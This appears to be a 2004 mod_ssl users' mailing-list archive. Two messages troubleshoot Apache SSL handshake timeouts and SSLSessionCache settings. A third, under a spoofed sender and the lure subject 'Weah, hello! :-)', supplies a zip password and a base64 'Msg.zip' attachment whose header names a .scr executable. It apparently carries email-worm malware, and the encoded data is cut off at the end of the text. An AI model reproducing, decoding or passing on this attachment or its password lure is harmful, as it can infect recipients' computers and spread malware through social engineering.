	by master.modssl.org (Postfix) with ESMTP id C53E7A8940
	for ; Tue,  9 Mar 2004 16:03:03 +0100 (CET)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [10.254.1.122])
	by maggotts.rnib.org.uk (8.12.8/8.12.8) with ESMTP id i29F335E012657
	for ; Tue, 9 Mar 2004 15:03:03 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2657.72)
	id ; Tue, 9 Mar 2004 15:03:03 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F05ADDDCE@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: SSL Handshake time out
Date: Tue, 9 Mar 2004 15:03:02 -0000 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2657.72)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

-----Original Message-----
From: Joe Pearson [mailto:joe@webdms.com]
Sent: Tuesday, 09 March 2004 14:39
To: modssl-users@modssl.org
Subject: SSL Handshake time out


Hello, 

I have a server that has been reaching max clients serveral times per day.
When I look at apache-status, 90% of the children are in "Reading Request"
state.  Most of them stay in that state until the apache "Timeout" is
reached. However, some of the children stay reading until I restart http.
Since this causes my server to become unresponsive, I've lowered the Timeout
to 200, which helps somewhat, but we still have the problem. 
> [snip]

What's your SSLSeesionCache set to? I can't remember the 7.2 settings (It'll
be in the archives though as I've posted the right one before). The Red Hat
9 setting is:

SSLSessionCache         dbm:/var/cache/mod_ssl/scache

Of course, 7.2 isn't supported by Red Hat any more, but there is a "legacy"
project to keep patches up to date.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Why do so many people who call themselves christians use the name of Jesus
Christ as a swear word?

- 
DISCLAIMER: 

NOTICE: The information contained in this email and any attachments is 
confidential and may be privileged. If you are not the intended 
recipient you should not use, disclose, distribute or copy any of the 
content of it or of any attachment; you are requested to notify the 
sender immediately of your receipt of the email and then to delete it 
and any attachments from your system. 

RNIB endeavours to ensure that emails and any attachments generated by 
its staff are free from viruses or other contaminants. However, it 
cannot accept any responsibility for any  such which are transmitted.
We therefore recommend you scan all attachments. 

Please note that the statements and views expressed in this email and 
any attachments are those of the author and do not necessarily represent 
those of RNIB. 

RNIB Registered Charity Number: 226227 

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar  9 17:28:52 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B24ACA8948; Tue,  9 Mar 2004 17:28:52 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.homecu.net (mail.homecu.net [199.184.207.89])
	by master.modssl.org (Postfix) with SMTP id 098DEA8940
	for ; Tue,  9 Mar 2004 17:28:36 +0100 (CET)
Received: (qmail 7445 invoked by uid 506); 9 Mar 2004 16:28:33 -0000
Received: from joe@webdms.com by mail.homecu.net by uid 503 with qmail-scanner-1.15 
 ( Clear:. 
 Processed in 0.029073 secs); 09 Mar 2004 16:28:33 -0000
Received: from unknown (HELO webdms.com) (199.184.207.194)
  by mail.homecu.net with SMTP; 9 Mar 2004 16:28:33 -0000
Message-ID: <404DF1D0.40407@webdms.com>
Date: Tue, 09 Mar 2004 09:33:20 -0700
From: Joe Pearson 
User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.5) Gecko/20031007
X-Accept-Language: en,pdf
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSL Handshake time out
References: <9B66BBD37D5DD411B8CE00508B69700F05ADDDCE@pborolocal.rnib.org.uk>
In-Reply-To: <9B66BBD37D5DD411B8CE00508B69700F05ADDDCE@pborolocal.rnib.org.uk>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Pearson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

SSLSessionCache shm:/var/cache/ssl_gcache_data(524288) 
I'm not sure why it is set to that, but it is.  I have a different 
system that does not have this problem and it's session cache is set thus:

SSLSessionCache         shm:logs/ssl_scache(512000)  

I've also noticed that children that don't get reset when the timeout is 
reached, usually end with this:
[09/Mar/2004 08:58:31 18268] [error] SSL handshake timed out (client 
164.165.89.
10, server www3.homecu.net:443)
[09/Mar/2004 09:02:23 18268] [error] SSL handshake interrupted by system 
[Hint:
Stop button pressed in browser?!] (System error follows)
[09/Mar/2004 09:02:23 18268] [error] System: Connection reset by peer 
(errno: 104)

We are subscribed to progeny for Redhat 7.x patches.  We tried RHEL and 
we had so many problems that we
had to revert back to 7.x until we decide what direction to go.

John.Airey@rnib.org.uk wrote:

>-----Original Message-----
>From: Joe Pearson [mailto:joe@webdms.com]
>Sent: Tuesday, 09 March 2004 14:39
>To: modssl-users@modssl.org
>Subject: SSL Handshake time out
>
>
>Hello, 
>
>I have a server that has been reaching max clients serveral times per day.
>When I look at apache-status, 90% of the children are in "Reading Request"
>state.  Most of them stay in that state until the apache "Timeout" is
>reached. However, some of the children stay reading until I restart http.
>Since this causes my server to become unresponsive, I've lowered the Timeout
>to 200, which helps somewhat, but we still have the problem. 
>  
>
>>[snip]
>>    
>>
>
>What's your SSLSeesionCache set to? I can't remember the 7.2 settings (It'll
>be in the archives though as I've posted the right one before). The Red Hat
>9 setting is:
>
>SSLSessionCache         dbm:/var/cache/mod_ssl/scache
>
>Of course, 7.2 isn't supported by Red Hat any more, but there is a "legacy"
>project to keep patches up to date.
>
>- 
>John Airey, BSc (Jt Hons), CNA, RHCE
>Internet systems support officer, ITCSD, Royal National Institute of the
>Blind,
>Bakewell Road, Peterborough PE2 6XU,
>Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 
>
>Why do so many people who call themselves christians use the name of Jesus
>Christ as a swear word?
>
>- 
>DISCLAIMER: 
>
>NOTICE: The information contained in this email and any attachments is 
>confidential and may be privileged. If you are not the intended 
>recipient you should not use, disclose, distribute or copy any of the 
>content of it or of any attachment; you are requested to notify the 
>sender immediately of your receipt of the email and then to delete it 
>and any attachments from your system. 
>
>RNIB endeavours to ensure that emails and any attachments generated by 
>its staff are free from viruses or other contaminants. However, it 
>cannot accept any responsibility for any  such which are transmitted.
>We therefore recommend you scan all attachments. 
>
>Please note that the statements and views expressed in this email and 
>any attachments are those of the author and do not necessarily represent 
>those of RNIB. 
>
>RNIB Registered Charity Number: 226227 
>
>Website: http://www.rnib.org.uk 
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar  9 19:57:40 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B492BA895E; Tue,  9 Mar 2004 19:57:40 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ammu (c-24-6-228-54.client.comcast.net [24.6.228.54])
	by master.modssl.org (Postfix) with SMTP id CA465A8946
	for ; Tue,  9 Mar 2004 19:57:37 +0100 (CET)
Date: Wed, 10 Mar 2004 10:59:14 +0530
To: modssl-users@modssl.org
Subject: Weah, hello! :-)
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------osyqmmgkjhosmjhbtqpb"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------osyqmmgkjhosmjhbtqpb
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

Argh, i don't like the plaintext  :)

pass: 24444

----------osyqmmgkjhosmjhbtqpb
Content-Type: application/octet-stream; name="Msg.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Msg.zip"

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
